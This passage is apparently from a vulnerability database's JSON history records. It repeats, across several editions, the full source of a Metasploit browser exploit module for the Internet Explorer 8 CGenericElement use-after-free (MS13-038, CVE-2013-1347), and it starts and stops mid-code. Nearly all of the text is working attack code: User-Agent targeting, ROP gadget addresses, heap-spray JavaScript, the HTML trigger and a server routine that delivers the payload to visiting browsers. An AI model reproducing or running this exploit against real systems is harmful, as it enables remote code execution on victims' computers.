document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-12T13:13:55", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-16T01:52:58", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-16T01:52:58"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-16T01:52:58", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-16T03:46:15", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-16T03:46:15"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-16T03:46:15", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-20T16:10:24", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-20T16:10:24"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-20T16:10:24", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-20T17:53:54", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-20T17:53:54"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and 